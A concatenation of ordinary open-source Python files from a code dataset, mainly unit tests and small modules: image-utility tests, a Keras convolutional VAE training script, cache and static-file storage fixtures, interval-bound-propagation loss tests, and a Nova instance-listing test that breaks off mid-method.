ra_at_xy_0_resized, dec_at_xy_0_resized, x_at_radec_0_resized, y_at_radec_0_resized, Mpix2coord_resized, Mcoord2pix_resized = image_util.rebin_coord_transform(2, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix)
assert ra_at_xy_0_resized == ra_at_xy_0_re
assert dec_at_xy_0_resized == dec_at_xy_0_re
assert x_at_radec_0_resized == x_at_radec_0_re
assert y_at_radec_0_resized == y_at_radec_0_re
npt.assert_almost_equal(Mcoord2pix_resized[0][0], Mcoord2pix_re[0][0], decimal=8)
npt.assert_almost_equal(Mpix2coord_re[0][0], Mpix2coord_resized[0][0], decimal=8)
x_grid, y_grid, ra_at_xy_0, dec_at_xy_0, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix = util.make_grid_with_coordtransform(numPix=99, deltapix=0.1, subgrid_res=1)
x_grid, y_grid, ra_at_xy_0_re, dec_at_xy_0_re, x_at_radec_0_re, y_at_radec_0_re, Mpix2coord_re, Mcoord2pix_re = util.make_grid_with_coordtransform(numPix=33, deltapix=0.3, subgrid_res=1)
assert x_at_radec_0 == 49
ra_at_xy_0_resized, dec_at_xy_0_resized, x_at_radec_0_resized, y_at_radec_0_resized, Mpix2coord_resized, Mcoord2pix_resized = image_util.rebin_coord_transform(3, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix)
assert x_at_radec_0_resized == 16
npt.assert_almost_equal(ra_at_xy_0_resized, ra_at_xy_0_re, decimal=8)
npt.assert_almost_equal(dec_at_xy_0_resized, dec_at_xy_0_re, decimal=8)
npt.assert_almost_equal(x_at_radec_0_resized, x_at_radec_0_re, decimal=8)
npt.assert_almost_equal(y_at_radec_0_resized, y_at_radec_0_re, decimal=8)
npt.assert_almost_equal(Mcoord2pix_resized[0][0], Mcoord2pix_re[0][0], decimal=8)
npt.assert_almost_equal(Mpix2coord_re[0][0], Mpix2coord_resized[0][0], decimal=8)
x_in, y_in = 10., 10.
ra, dec = util.map_coord2pix(x_in, y_in, ra_at_xy_0, dec_at_xy_0, Mpix2coord)
x_out, y_out = util.map_coord2pix(ra, dec, x_at_radec_0, y_at_radec_0, Mcoord2pix)
assert x_in == x_out
assert y_in == y_out
x_in, y_in = 10., 10.
ra, dec = util.map_coord2pix(x_in, y_in, ra_at_xy_0_resized, dec_at_xy_0_resized, Mpix2coord_resized)
x_out, y_out = util.map_coord2pix(ra, dec, x_at_radec_0_resized, y_at_radec_0_resized, Mcoord2pix_resized)
assert x_in == x_out
assert y_in == y_out
def test_rotateImage():
img = np.zeros((5, 5))
img[2, 2] = 1
img[1, 2] = 0.5
angle = 360
im_rot = image_util.rotateImage(img, angle)
npt.assert_almost_equal(im_rot[1, 2], 0.5, decimal=10)
npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
npt.assert_almost_equal(im_rot[2, 1], 0., decimal=10)
angle = 360./2
im_rot = image_util.rotateImage(img, angle)
npt.assert_almost_equal(im_rot[1, 2], 0., decimal=10)
npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
npt.assert_almost_equal(im_rot[3, 2], 0.5, decimal=10)
angle = 360./4
im_rot = image_util.rotateImage(img, angle)
npt.assert_almost_equal(im_rot[1, 2], 0., decimal=10)
npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
npt.assert_almost_equal(im_rot[2, 1], 0.5, decimal=10)
angle = 360./8
im_rot = image_util.rotateImage(img, angle)
npt.assert_almost_equal(im_rot[1, 2], 0.23931518624017051, decimal=10)
npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
npt.assert_almost_equal(im_rot[2, 1], 0.23931518624017073, decimal=10)
def test_re_size_array():
numPix = 9
kernel = np.zeros((numPix, numPix))
kernel[int((numPix-1)/2), int((numPix-1)/2)] = 1
subgrid_res = 2
input_values = kernel
x_in = np.linspace(0, 1, numPix)
x_out = np.linspace(0, 1, numPix*subgrid_res)
out_values = image_util.re_size_array(x_in, x_in, input_values, x_out, x_out)
kernel_out = out_values
assert kernel_out[int((numPix*subgrid_res-1)/2), int((numPix*subgrid_res-1)/2)] == 0.58477508650519028
def test_symmetry_average():
image = np.zeros((5,5))
image[2, 3] = 1
symmetry = 2
img_sym = image_util.symmetry_average(image, symmetry)
npt.assert_almost_equal(img_sym[2, 1], 0.5, decimal=10)
def test_cut_edges():
image = np.zeros((51,51))
image[25][25] = 1
numPix = 21
resized = image_util.cut_edges(image, numPix)
nx, ny = resized.shape
assert nx == numPix
assert ny == numPix
assert resized[10][10] == 1
image = np.zeros((5, 5))
image[2, 2] = 1
numPix = 3
image_cut = image_util.cut_edges(image, numPix)
assert len(image_cut) == numPix
assert image_cut[1, 1] == 1
image = np.zeros((6, 6))
image[3, 2] = 1
numPix = 4
image_cut = image_util.cut_edges(image, numPix)
assert len(image_cut) == numPix
assert image_cut[2, 1] == 1
image = np.zeros((6, 8))
image[3, 2] = 1
numPix = 4
image_cut = image_util.cut_edges(image, numPix)
assert len(image_cut) == numPix
assert image_cut[2, 0] == 1
def test_re_size():
grid = np.zeros((200, 100))
grid[100, 50] = 4
grid_small = image_util.re_size(grid, factor=2)
assert grid_small[50][25] == 1
grid_same = image_util.re_size(grid, factor=1)
npt.assert_equal(grid_same, grid)
def test_stack_images():
numPix = 10
image1 = np.ones((numPix, numPix))
image2 = np.ones((numPix, numPix)) / 10.
image_list = [image1, image2]
wht1 = np.ones((numPix, numPix))
wht2 = np.ones((numPix, numPix)) * 10
wht_list = [wht1, wht2]
sigma_list = [0.1, 0.2]
image_stacked, wht_stacked, sigma_stacked = image_util.stack_images(image_list=image_list, wht_list=wht_list, sigma_list=sigma_list)
assert sigma_stacked == 0.19306145983268458
assert image_stacked[0, 0] == 0.18181818181818182
assert wht_stacked[0, 0] == 5.5
def test_rebin_image():
numPix = 10
bin_size = 2
image = np.ones((numPix, numPix))
wht_map = np.ones((numPix, numPix)) * 10
idex_mask = np.ones((numPix, numPix))
sigma_bkg = 0.1
ra_coords, dec_coords = util.make_grid(numPix, deltapix=0.05)
ra_coords = util.array2image(ra_coords)
dec_coords = util.array2image(dec_coords)
image_resized, wht_map_resized, sigma_bkg_resized, ra_coords_resized, dec_coords_resized, idex_mask_resized = image_util.rebin_image(bin_size, image, wht_map, sigma_bkg, ra_coords, dec_coords, idex_mask)
assert image_resized[0, 0] == 4
assert wht_map_resized[0, 0] == wht_map[0, 0]
assert sigma_bkg_resized == 0.2
assert ra_coords_resized[0, 0] == -0.2
numPix = 11
bin_size = 2
image = np.ones((numPix, numPix))
wht_map = np.ones((numPix, numPix)) * 10
idex_mask = np.ones((numPix, numPix))
sigma_bkg = 0.1
ra_coords, dec_coords = util.make_grid(numPix, deltapix=0.05)
ra_coords = util.array2image(ra_coords)
dec_coords = util.array2image(dec_coords)
image_resized, wht_map_resized, sigma_bkg_resized, ra_coords_resized, dec_coords_resized, idex_mask_resized = image_util.rebin_image(
bin_size, image, wht_map, sigma_bkg, ra_coords, dec_coords, idex_mask)
assert image_resized[0, 0] == 4
assert wht_map_resized[0, 0] == wht_map[0, 0]
assert sigma_bkg_resized == 0.2
npt.assert_almost_equal(ra_coords_resized[0, 0], -0.225, decimal=8)
def test_radial_profile():
from lenstronomy.LightModel.Profiles.gaussian import Gaussian
gauss = Gaussian()
x, y = util.make_grid(11, 1)
flux = gauss.function(x, y, sigma=10, amp=1)
data = util.array2image(flux)
profile_r = image_util.radial_profile(data, center=[5, 5])
profile_r_true = gauss.function(np.linspace(0, stop=7, num=8), 0, sigma=10, amp=1)
npt.assert_almost_equal(profile_r, profile_r_true, decimal=3)
def test_gradient_map():
image = np.zeros((6, 8))
grad = image_util.gradient_map(image)
npt.assert_almost_equal(grad, image, decimal=6)
image_ones = np.ones((6, 8))
grad = image_util.gradient_map(image_ones)
npt.assert_almost_equal(grad, image, decimal=6)
assert np.shape(grad) == np.shape(image)
class TestRaise(unittest.TestCase):
def test_raise(self):
with self.assertRaises(ValueError):
grid2d = np.zeros((7, 7))
x_pos, y_pos = 4, 1
kernel = np.ones((2, 2))
added = image_util.add_layer2image_int(grid2d, x_pos, y_pos, kernel)
with self.assertRaises(ValueError):
image = np.ones((5, 5))
image_util.re_size(image, factor=2)
with self.assertRaises(ValueError):
image = np.ones((5, 5))
image_util.re_size(image, factor=0.5)
with self.assertRaises(ValueError):
image = np.ones((5, 5))
image_util.cut_edges(image, numPix=7)
with self.assertRaises(ValueError):
image = np.ones((5, 6))
image_util.cut_edges(image, numPix=3)
with self.assertRaises(ValueError):
image = np.ones((5, 5))
image_util.cut_edges(image, numPix=2)
if __name__ == '__main__':
pytest.main()
|
sphinxext/suites.py
|
zmoon/scipy-lecture-notes
| 2,538 |
64481
|
def fib(n):
"return nth term of Fibonacci sequence"
a, b = 0, 1
i = 0
while i<n:
a, b = b, a+b
i += 1
return b
def linear_recurrence(n, coefs=(2, 0), seed=(1, 1)):
    """return nth term of the sequence defined by the
    linear recurrence
    u(n+2) = a*u(n+1) + b*u(n)
    where coefs = (a, b) and seed = (u0, u1)"""
    a, b = coefs
    u0, u1 = seed
    i = 0
    u, v = u0, u1
    while i < n:
        w = a*v + b*u
        u, v = v, w
        i += 1
    return w
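# --- Added usage sketch (illustration only), exercising the helpers above with tuple-style
# coefficient and seed arguments:
if __name__ == "__main__":
    assert fib(5) == 8                                 # this fib(n) returns F(n+1) of 0, 1, 1, 2, 3, 5, 8, ...
    assert linear_recurrence(3) == 8                   # defaults (a, b) = (2, 0), (u0, u1) = (1, 1): powers of two
    assert linear_recurrence(5, (1, 1), (0, 1)) == 8   # Fibonacci coefficients reproduce fib(5)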
|
dataset_code/pred_proba_XGB.py
|
mapicccy/Stock-Market-Trend-Analysis-Using-HMM-LSTM
| 147 |
64492
|
import numpy as np
from public_tool.form_index import form_index
from XGB_HMM.form_B_matrix_by_XGB import form_B_matrix_by_XGB
from XGB_HMM.predict import self_pred
def pred_proba_XGB(A, model, pi, O, allow_flag, lengths):
# Build pred_proba for the dataset. Note that the dataset here is the output of
# solve_on_raw_data, i.e. data that carries an allow_flag.
# output:
#     pred_proba: numpy array
n_states = len(pi)
pred_proba = np.zeros((O.shape[0], n_states))
for i in range(len(lengths)):
begin_index, end_index = form_index(lengths, i)
now_O = O[begin_index:end_index, :]
now_allow_flag = allow_flag[begin_index:end_index]
now_pred_proba = np.zeros((now_O.shape[0], n_states))
now_allow_B = form_B_matrix_by_XGB(model, now_O[now_allow_flag == 1], pi)
_, now_allow_pred_proba, _ = self_pred(now_allow_B, [now_allow_B.shape[0]], A, pi)
now_pred_proba[now_allow_flag == 1] = now_allow_pred_proba
pred_proba[begin_index:end_index] = now_pred_proba
return pred_proba
|
tests/SampleApps/python/django-react-boilerplate/exampleapp/models.py
|
samruddhikhandale/Oryx
| 403 |
64506
|
from __future__ import unicode_literals
from django.db import models # noqa
# Create your models here.
|
src/test.py
|
chaitanya100100/VAE
| 115 |
64507
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
import cPickle
from keras.layers import Input, Dense, Lambda, Flatten, Reshape, Layer
from keras.layers import Conv2D, Conv2DTranspose
from keras.models import Model
from keras import backend as K
from keras import metrics
from keras import optimizers
from full_params_conv_101 import *
if K.image_data_format() == 'channels_first':
original_img_size = (img_chns, img_rows, img_cols)
else:
original_img_size = (img_rows, img_cols, img_chns)
x = Input(shape=original_img_size)
conv_1 = Conv2D(32,
kernel_size=(4, 4),
strides=(2, 2),
padding='same', activation='relu')(x)
conv_2 = Conv2D(64,
kernel_size=(4, 4),
padding='same', activation='relu',
strides=(2, 2))(conv_1)
conv_3 = Conv2D(128,
kernel_size=(4, 4),
padding='same', activation='relu',
strides=(2, 2))(conv_2)
conv_4 = Conv2D(256,
kernel_size=(4, 4),
padding='same', activation='relu',
strides=(2, 2))(conv_3)
flat = Flatten()(conv_4)
hidden = Dense(intermediate_dim, activation='relu')(flat)
z_mean = Dense(latent_dim)(hidden)
z_log_var = Dense(latent_dim)(hidden)
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
mean=0., stddev=epsilon_std)
return z_mean + K.exp(z_log_var) * epsilon
# note that "output_shape" isn't necessary with the TensorFlow backend
# so you could write `Lambda(sampling)([z_mean, z_log_var])`
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
# we instantiate these layers separately so as to reuse them later
decoder_hid = Dense(intermediate_dim, activation='relu')
decoder_upsample = Dense(16384, activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, 256, 8, 8)
else:
output_shape = (batch_size, 8, 8, 256)
decoder_reshape = Reshape(output_shape[1:])
decoder_deconv_1 = Conv2DTranspose(128,
kernel_size=(4, 4),
padding='same',
strides=(2, 2),
activation='relu')
decoder_deconv_2 = Conv2DTranspose(64,
kernel_size=(4, 4),
padding='same',
strides=(2, 2),
activation='relu')
decoder_deconv_3_upsamp = Conv2DTranspose(32,
kernel_size=(4, 4),
strides=(2, 2),
padding='same',
activation='relu')
decoder_mean_squash = Conv2DTranspose(3,
kernel_size=(4, 4),
strides=(2, 2),
padding='same',
activation='relu')
hid_decoded = decoder_hid(z)
up_decoded = decoder_upsample(hid_decoded)
reshape_decoded = decoder_reshape(up_decoded)
deconv_1_decoded = decoder_deconv_1(reshape_decoded)
deconv_2_decoded = decoder_deconv_2(deconv_1_decoded)
x_decoded_relu = decoder_deconv_3_upsamp(deconv_2_decoded)
x_decoded_mean_squash = decoder_mean_squash(x_decoded_relu)
# Custom loss layer
class CustomVariationalLayer(Layer):
def __init__(self, **kwargs):
self.is_placeholder = True
super(CustomVariationalLayer, self).__init__(**kwargs)
def vae_loss(self, x, x_decoded_mean_squash):
x = K.flatten(x)
x_decoded_mean_squash = K.flatten(x_decoded_mean_squash)
xent_loss = img_rows * img_cols * metrics.binary_crossentropy(x, x_decoded_mean_squash)
kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
return K.mean(xent_loss + kl_loss)
def call(self, inputs):
x = inputs[0]
x_decoded_mean_squash = inputs[1]
loss = self.vae_loss(x, x_decoded_mean_squash)
self.add_loss(loss, inputs=inputs)
# We don't use this output.
return x
y = CustomVariationalLayer()([x, x_decoded_mean_squash])
vae = Model(x, y)
sgd = optimizers.SGD(lr=0.01)
vae.compile(optimizer=sgd, loss=None)
vae.summary()
"""
with open('../datasets/101_ObjectCategories.pkl') as f:
dic = cPickle.load(f)
x_train = dic['all_images']
"""
x_train = np.load('../datasets/full_x.npy')
print "dataset loaded"
history = vae.fit(x_train,
shuffle=True,
epochs=epochs,
batch_size=batch_size,
)
# build a model to project inputs on the latent space
encoder = Model(x, z_mean)
"""
# display a 2D plot of the digit classes in the latent space
x_test_encoded = encoder.predict(x_test, batch_size=batch_size)
plt.figure(figsize=(6, 6))
plt.scatter(x_test_encoded[:, 0], x_test_encoded[:, 1], c=y_test)
plt.colorbar()
plt.show()
"""
# build a digit generator that can sample from the learned distribution
decoder_input = Input(shape=(latent_dim,))
_hid_decoded = decoder_hid(decoder_input)
_up_decoded = decoder_upsample(_hid_decoded)
_reshape_decoded = decoder_reshape(_up_decoded)
_deconv_1_decoded = decoder_deconv_1(_reshape_decoded)
_deconv_2_decoded = decoder_deconv_2(_deconv_1_decoded)
_x_decoded_relu = decoder_deconv_3_upsamp(_deconv_2_decoded)
_x_decoded_mean_squash = decoder_mean_squash(_x_decoded_relu)
generator = Model(decoder_input, _x_decoded_mean_squash)
vae.save('../models/object101_ld_%d_conv_%d_id_%d_e_%d_vae.h5' % (latent_dim, num_conv, intermediate_dim, epochs))
encoder.save('../models/object101_ld_%d_conv_%d_id_%d_e_%d_encoder.h5' % (latent_dim, num_conv, intermediate_dim, epochs))
generator.save('../models/object101_ld_%d_conv_%d_id_%d_e_%d_generator.h5' % (latent_dim, num_conv, intermediate_dim, epochs))
fname = '../models/object101_ld_%d_conv_%d_id_%d_e_%d_history.pkl' % (latent_dim, num_conv, intermediate_dim, epochs)
with open(fname, 'wb') as file_pi:
cPickle.dump(history.history, file_pi)
"""
# display a 2D manifold of the digits
n = 15 # figure with 15x15 digits
digit_size = 28
figure = np.zeros((digit_size * n, digit_size * n))
# linearly spaced coordinates on the unit square were transformed through the inverse CDF (ppf) of the Gaussian
# to produce values of the latent variables z, since the prior of the latent space is Gaussian
grid_x = norm.ppf(np.linspace(0.05, 0.95, n))
grid_y = norm.ppf(np.linspace(0.05, 0.95, n))
for i, yi in enumerate(grid_x):
for j, xi in enumerate(grid_y):
z_sample = np.array([[xi, yi]])
z_sample = np.tile(z_sample, batch_size).reshape(batch_size, 2)
x_decoded = generator.predict(z_sample, batch_size=batch_size)
digit = x_decoded[0].reshape(digit_size, digit_size)
figure[i * digit_size: (i + 1) * digit_size,
j * digit_size: (j + 1) * digit_size] = digit
plt.figure(figsize=(10, 10))
plt.imshow(figure, cmap='Greys_r')
plt.show()
"""
|
crabageprediction/venv/Lib/site-packages/pandas/io/formats/__init__.py
|
13rianlucero/CrabAgePrediction
| 28,899 |
64514
|
<gh_stars>1000+
from typing import TYPE_CHECKING
if TYPE_CHECKING:
# import modules that have public classes/functions
from pandas.io.formats import style
# and mark only those modules as public
__all__ = ["style"]
|
tests/ut/conftest.py
|
rspadim/aiocache
| 213 |
64524
|
<filename>tests/ut/conftest.py
import pytest
import asynctest
from aiocache.base import BaseCache, API
from aiocache import caches, RedisCache, MemcachedCache
from aiocache.plugins import BasePlugin
from aiocache.serializers import BaseSerializer
def pytest_configure():
"""
Before pytest_namespace was being used to set the keys for
testing but the feature was removed
https://docs.pytest.org/en/latest/deprecations.html#pytest-namespace
"""
pytest.KEY = "key"
pytest.KEY_1 = "random"
@pytest.fixture(autouse=True)
def reset_caches():
caches.set_config(
{
"default": {
"cache": "aiocache.SimpleMemoryCache",
"serializer": {"class": "aiocache.serializers.NullSerializer"},
}
}
)
class MockCache(BaseCache):
def __init__(self):
super().__init__()
self._add = asynctest.CoroutineMock()
self._get = asynctest.CoroutineMock()
self._gets = asynctest.CoroutineMock()
self._set = asynctest.CoroutineMock()
self._multi_get = asynctest.CoroutineMock(return_value=["a", "b"])
self._multi_set = asynctest.CoroutineMock()
self._delete = asynctest.CoroutineMock()
self._exists = asynctest.CoroutineMock()
self._increment = asynctest.CoroutineMock()
self._expire = asynctest.CoroutineMock()
self._clear = asynctest.CoroutineMock()
self._raw = asynctest.CoroutineMock()
self._redlock_release = asynctest.CoroutineMock()
self.acquire_conn = asynctest.CoroutineMock()
self.release_conn = asynctest.CoroutineMock()
self._close = asynctest.CoroutineMock()
@pytest.fixture
def mock_cache(mocker):
cache = MockCache()
cache.timeout = 0.002
mocker.spy(cache, "_build_key")
for cmd in API.CMDS:
mocker.spy(cache, cmd.__name__)
mocker.spy(cache, "close")
cache.serializer = asynctest.Mock(spec=BaseSerializer)
cache.serializer.encoding = "utf-8"
cache.plugins = [asynctest.Mock(spec=BasePlugin)]
return cache
@pytest.fixture
def base_cache():
return BaseCache()
@pytest.fixture
def redis_cache():
cache = RedisCache()
return cache
@pytest.fixture
def memcached_cache():
cache = MemcachedCache()
return cache
|
tests/tests/test_storage.py
|
karlwnw/django-pipeline
| 598 |
64580
|
<filename>tests/tests/test_storage.py
from django.contrib.staticfiles import finders
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.management import call_command
from django.test import TestCase
from django.test.utils import override_settings
from django.test.utils import modify_settings
from pipeline.collector import default_collector
from pipeline.storage import PipelineStorage
from tests.tests.test_compiler import DummyCompiler
from tests.utils import pipeline_settings
from io import StringIO
class PipelineNoPathStorage(PipelineStorage):
"""Storage without an implemented path method"""
def path(self, *args):
raise NotImplementedError()
def delete(self, *args):
return
def exists(self, *args):
return True
def save(self, *args):
return
def open(self, *args):
return StringIO()
def listdir(self, *args):
return []
class DummyCSSCompiler(DummyCompiler):
""" Handles css files """
output_extension = 'css'
def match_file(self, path):
return path.endswith('.css')
class StorageTest(TestCase):
def tearDown(self):
staticfiles_storage._setup()
@pipeline_settings(JS_COMPRESSOR=None, CSS_COMPRESSOR=None)
def test_post_process_dry_run(self):
default_collector.collect()
processed_files = PipelineStorage().post_process({}, True)
self.assertEqual(list(processed_files), [])
@pipeline_settings(JS_COMPRESSOR=None, CSS_COMPRESSOR=None, COMPILERS=['tests.tests.test_storage.DummyCSSCompiler'])
def test_post_process(self):
default_collector.collect()
storage = PipelineStorage()
processed_files = storage.post_process({})
self.assertTrue(('screen.css', 'screen.css', True) in processed_files)
self.assertTrue(('scripts.js', 'scripts.js', True) in processed_files)
@override_settings(STATICFILES_STORAGE='tests.tests.test_storage.PipelineNoPathStorage')
@pipeline_settings(JS_COMPRESSOR=None, CSS_COMPRESSOR=None, COMPILERS=['tests.tests.test_storage.DummyCSSCompiler'])
def test_post_process_no_path(self):
"""
Test post_process with a storage that doesn't implement the path method.
"""
staticfiles_storage._setup()
try:
call_command('collectstatic', verbosity=0, interactive=False)
except NotImplementedError:
self.fail('Received an error running collectstatic')
@modify_settings(STATICFILES_FINDERS={
'append': 'pipeline.finders.PipelineFinder'
})
def test_nonexistent_file_pipeline_finder(self):
path = finders.find('nothing.css')
self.assertIsNone(path)
@modify_settings(STATICFILES_FINDERS={
'append': 'pipeline.finders.CachedFileFinder'
})
def test_nonexistent_file_cached_finder(self):
path = finders.find('nothing.css')
self.assertIsNone(path)
@modify_settings(STATICFILES_FINDERS={
'append': 'pipeline.finders.PipelineFinder'
})
def test_nonexistent_double_extension_file_pipeline_finder(self):
path = finders.find('app.css.map')
self.assertIsNone(path)
@modify_settings(STATICFILES_FINDERS={
'append': 'pipeline.finders.CachedFileFinder'
})
def test_nonexistent_double_extension_file_cached_finder(self):
path = finders.find('app.css.map')
self.assertIsNone(path)
|
interval_bound_propagation/tests/loss_test.py
|
cknabs/interval-bound-propagation
| 140 |
64583
|
# coding=utf-8
# Copyright 2019 The Interval Bound Propagation Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for loss."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import interval_bound_propagation as ibp
import sonnet as snt
import tensorflow.compat.v1 as tf
class FixedNN(snt.AbstractModule):
def _build(self, z0, is_training=False):
self._m = snt.Linear(2, initializers={
'w': tf.constant_initializer(1.),
'b': lambda *unused_args, **unused_kwargs: tf.constant([0., 1.]),
})
return self._m(z0)
class LossTest(tf.test.TestCase):
def testEndToEnd(self):
predictor = FixedNN()
predictor = ibp.VerifiableModelWrapper(predictor)
# Labels.
labels = tf.constant([1], dtype=tf.int64)
# Connect to input.
z = tf.constant([[1, 2, 3]], dtype=tf.float32)
predictor(z, is_training=True)
# Input bounds.
eps = 1.
input_bounds = ibp.IntervalBounds(z - eps, z + eps)
predictor.propagate_bounds(input_bounds)
# Create output specification (that forces the first logits to be greater).
c = tf.constant([[[1, -1]]], dtype=tf.float32)
d = tf.constant([[0]], dtype=tf.float32)
# Turn elision off for more interesting results.
spec = ibp.LinearSpecification(c, d, collapse=False)
# Create an attack.
attack = ibp.UntargetedPGDAttack(
predictor, spec, eps, num_steps=1, input_bounds=(-100., 100))
# Build loss.
losses = ibp.Losses(predictor, spec, attack,
interval_bounds_loss_type='hinge',
interval_bounds_hinge_margin=0.)
losses(labels)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
# We expect the worst-case logits from IBP to be [9, 4].
# The adversarial attack should fail since logits are always [l, l + 1].
# Similarly, the nominal predictions are correct.
accuracy_values, loss_values = sess.run(
[losses.scalar_metrics, losses.scalar_losses])
self.assertAlmostEqual(1., accuracy_values.nominal_accuracy)
self.assertAlmostEqual(0., accuracy_values.verified_accuracy)
self.assertAlmostEqual(1., accuracy_values.attack_accuracy)
expected_xent = 0.31326168751822947
self.assertAlmostEqual(expected_xent, loss_values.nominal_cross_entropy,
places=5)
self.assertAlmostEqual(expected_xent, loss_values.attack_cross_entropy,
places=5)
expected_hinge = 5.
self.assertAlmostEqual(expected_hinge, loss_values.verified_loss)
if __name__ == '__main__':
tf.test.main()
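# --- Added worked example (illustration only; plain NumPy, independent of the graph above)
# reproducing the numbers asserted in testEndToEnd: with unit weights, bias [0, 1], input
# z = [1, 2, 3] and eps = 1, interval arithmetic gives logit_0 in [3, 9] and logit_1 in [4, 10];
# the worst case for true label 1 pairs the upper bound of logit_0 with the lower bound of logit_1.
import numpy as np
_z = np.array([1., 2., 3.])
_eps = 1.
_b = np.array([0., 1.])
_lower = np.sum(_z - _eps) + _b                       # [3., 4.]
_upper = np.sum(_z + _eps) + _b                       # [9., 10.]
_worst_case = np.array([_upper[0], _lower[1]])        # [9., 4.], as noted in the test
_hinge = _worst_case[0] - _worst_case[1]              # 5.0 == expected_hinge
_nominal = np.sum(_z) + _b                            # [6., 7.]: logits are always [l, l + 1]
_xent = np.log1p(np.exp(_nominal[0] - _nominal[1]))   # log(1 + e**-1) ~= 0.313262 == expected_xent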
|
nova/tests/functional/compute/test_instance_list.py
|
zjzh/nova
| 1,874 |
64594
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from oslo_utils.fixture import uuidsentinel as uuids
from nova.compute import instance_list
from nova import context
from nova.db.main import api as db
from nova import exception
from nova import objects
from nova import test
class InstanceListTestCase(test.TestCase):
NUMBER_OF_CELLS = 3
def setUp(self):
super(InstanceListTestCase, self).setUp()
self.context = context.RequestContext('fake', 'fake')
self.num_instances = 3
self.instances = []
start = datetime.datetime(1985, 10, 25, 1, 21, 0)
dt = start
spread = datetime.timedelta(minutes=10)
self.cells = objects.CellMappingList.get_all(self.context)
# Create three instances in each of the real cells. Leave the
# first cell empty to make sure we don't break with an empty
# one.
for cell in self.cells[1:]:
for i in range(0, self.num_instances):
with context.target_cell(self.context, cell) as cctx:
inst = objects.Instance(
context=cctx,
project_id=self.context.project_id,
user_id=self.context.user_id,
created_at=start,
launched_at=dt,
instance_type_id=i,
hostname='%s-inst%i' % (cell.name, i))
inst.create()
if i % 2 == 0:
# Make some faults for this instance
for n in range(0, i + 1):
msg = 'fault%i-%s' % (n, inst.hostname)
f = objects.InstanceFault(context=cctx,
instance_uuid=inst.uuid,
code=i,
message=msg,
details='fake',
host='fakehost')
f.create()
self.instances.append(inst)
im = objects.InstanceMapping(context=self.context,
project_id=inst.project_id,
user_id=inst.user_id,
instance_uuid=inst.uuid,
cell_mapping=cell)
im.create()
dt += spread
def test_get_sorted(self):
filters = {}
limit = None
marker = None
columns = []
sort_keys = ['uuid']
sort_dirs = ['asc']
obj, insts = instance_list.get_instances_sorted(self.context, filters,
limit, marker, columns,
sort_keys, sort_dirs)
uuids = [inst['uuid'] for inst in insts]
self.assertEqual(sorted(uuids), uuids)
self.assertEqual(len(self.instances), len(uuids))
def test_get_sorted_descending(self):
filters = {}
limit = None
marker = None
columns = []
sort_keys = ['uuid']
sort_dirs = ['desc']
obj, insts = instance_list.get_instances_sorted(self.context, filters,
limit, marker, columns,
sort_keys, sort_dirs)
uuids = [inst['uuid'] for inst in insts]
self.assertEqual(list(reversed(sorted(uuids))), uuids)
self.assertEqual(len(self.instances), len(uuids))
def test_get_sorted_with_filter(self):
filters = {'instance_type_id': 1}
limit = None
marker = None
columns = []
sort_keys = ['uuid']
sort_dirs = ['asc']
obj, insts = instance_list.get_instances_sorted(self.context, filters,
limit, marker, columns,
sort_keys, sort_dirs)
uuids = [inst['uuid'] for inst in insts]
expected = [inst['uuid'] for inst in self.instances
if inst['instance_type_id'] == 1]
self.assertEqual(list(sorted(expected)), uuids)
def test_get_sorted_by_defaults(self):
filters = {}
limit = None
marker = None
columns = []
sort_keys = None
sort_dirs = None
obj, insts = instance_list.get_instances_sorted(self.context, filters,
limit, marker, columns,
sort_keys, sort_dirs)
uuids = set([inst['uuid'] for inst in insts])
expected = set([inst['uuid'] for inst in self.instances])
self.assertEqual(expected, uuids)
def test_get_sorted_with_limit(self):
obj, insts = instance_list.get_instances_sorted(self.context, {},
5, None,
[], ['uuid'], ['asc'])
uuids = [inst['uuid'] for inst in insts]
had_uuids = [inst.uuid for inst in self.instances]
self.assertEqual(sorted(had_uuids)[:5], uuids)
self.assertEqual(5, len(uuids))
def test_get_sorted_with_large_limit(self):
obj, insts = instance_list.get_instances_sorted(self.context, {},
5000, None,
[], ['uuid'], ['asc'])
uuids = [inst['uuid'] for inst in insts]
self.assertEqual(sorted(uuids), uuids)
self.assertEqual(len(self.instances), len(uuids))
def test_get_sorted_with_large_limit_batched(self):
obj, insts = instance_list.get_instances_sorted(self.context, {},
5000, None,
[], ['uuid'], ['asc'],
batch_size=2)
uuids = [inst['uuid'] for inst in insts]
self.assertEqual(sorted(uuids), uuids)
self.assertEqual(len(self.instances), len(uuids))
def _test_get_sorted_with_limit_marker(self, sort_by, pages=2, pagesize=2,
sort_dir='asc'):
"""Get multiple pages by a sort key and validate the results.
This requests $pages of $pagesize, followed by a final page with
no limit, and a final-final page which should be empty. It validates
that we got a consistent set of results no matter where the page
boundary is, that we got all the results after the unlimited query,
and that the final page comes back empty when we use the last
instance as a marker.
"""
insts = []
page = 0
while True:
if page >= pages:
